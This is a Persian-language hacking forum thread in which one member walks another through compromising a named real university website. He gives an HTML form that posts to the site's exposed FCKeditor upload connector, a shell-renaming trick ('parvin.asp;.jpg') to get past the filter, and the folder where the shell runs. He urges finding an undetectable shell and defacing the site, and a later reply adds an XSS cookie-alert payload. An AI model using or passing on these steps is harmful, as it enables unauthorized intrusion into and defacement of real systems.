+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+---- انجمن: LEARNING HACKING (http://parsicoders.com/forumdisplay.php?fid=125)
+---- موضوع: اموزش XSS و کدهای ان (/showthread.php?tid=1603)
RE: اموزش XSS و کدهای ان - parvin - 01-23-2012
الان من اين ادرس ها رو باز ميكنم كه هيچ اتفاقي نميوفته.
چطوري ميشه با اين باگ يه تصوير دلخواه گذاشت بذاريم تو سايت
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-23-2012
ببینید باید باگ xss تو قسمت نظرات باشه اون که من مثال زدم یه تست بود توی قسمت نظرات باید باشه وقتی ادمین پیغامو دید کوکیشو زد نه اینجوری
این سایت باگ های خیلی بیشتر از xss داره !
RE: اموزش XSS و کدهای ان - parvin - 01-23-2012
تو باگ xss ميشه تو اسكريپت ادرس يه تصوير كه قبلا يه جاي ديگه اپلود كرديم رو داد؟
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-23-2012
اره حتی میشه هدایتش کرد به یه صفحه دیگه
البته لینک باید مدیر سایت ببینه اونم توضیح میدم
سوالهای دیگه رو تو بخش دیگه بپرسید اگر یر xss دارید.
تارگت رو که دادید اسکن کنید خیلی باگ داره
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-23-2012
اینم از سایت شما
http://jjs.uestc.edu.cn/upload/file/301467_1869175868886_1825783433_1462590_2044381917_n.jpg
خوابم میاد حوصله ترتیبشو دادن ندارم
RE: اموزش XSS و کدهای ان - parvin - 01-23-2012
ممنون . میشه بگید این کار رو چطوری کردید؟ با کدوم باگش ؟ من اسکنش کردم و 7 تا باگ داشت. با کدومش شد عکستون رو بریزید؟ روشش رو هم بگید. ببخشید 3 نمره داره باید روشش رو بلد باشم .جبران میکنم
RE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-23-2012
چطوری جبران میکنی ؟ :d (شوخی)
وب سایتو اسکن کردم یه fckeditor داشت لعنتی سایت که نبود همه fckeditor هاش خراب بود.
بعد اگر توجه کنی به اسکنر ادرس زیر رو میده
کد:
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/بعد از طریق خود fckeditor هم نمیشد چیزی اپلود کنی پس راه حل چی بود ؟
به کد زیر توجه کن
notepad رو باز کن کدهای زیر رو داخلش کپی کن و به اسم parvin.html ذخیره کن
کد :
کد:
<strong>parsicoders File Uploader Exploit In FCKeditor</strong>
<form enctype="multipart/form-data" action="
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>حالا میتونی شل و یا عکستو اپلود کنی باید یه شل پیدا کنی که شناسایی نشه و پاک نشه اپلود کن و دیفیس بزن حالشو ببر
کارشو زودی تمام کن تا کس دیگه ترتیبشو نداده این سایت ها افت کلاسه که هکشون کنم :-)
هر وقت خواستی shell اپلود کنی اسمشو به این نام تغییر بده
کد:
parvin.asp;.jpgفایل شل رو وقتی اپلود کردی تو این پوشه پیدا کن و اجراش کن
کد:
http://jjs.uestc.edu.cn/upload/fileبه همین راحتی و به همین باحالی :P
RE: اموزش XSS و کدهای ان - parvin - 01-23-2012
مرسي
کد:
http://jjs.uestc.edu.cn/upload/file/PPPP.JPGRE: اموزش XSS و کدهای ان - Amin_Mansouri - 01-23-2012
(01-23-2012، 03:29 PM)parvin نوشته: مرسي
کد:http://jjs.uestc.edu.cn/upload/file/PPPP.JPG
استادتون همین سایته رو داده ؟
اگر داده همین کافیه چون fckeditor اپلودش رو bypass شده
بگرد یه شل پیدا کن کلا دیفیس بزن :d
RE: اموزش XSS و کدهای ان - Ghoghnus - 06-08-2012
امین جان اگه به جای ساختن اون فای و اپلودش از این دستور استفاده کنیم نتیجه فرق میکنه!
کد:
<script>alert(document.cookie)</script>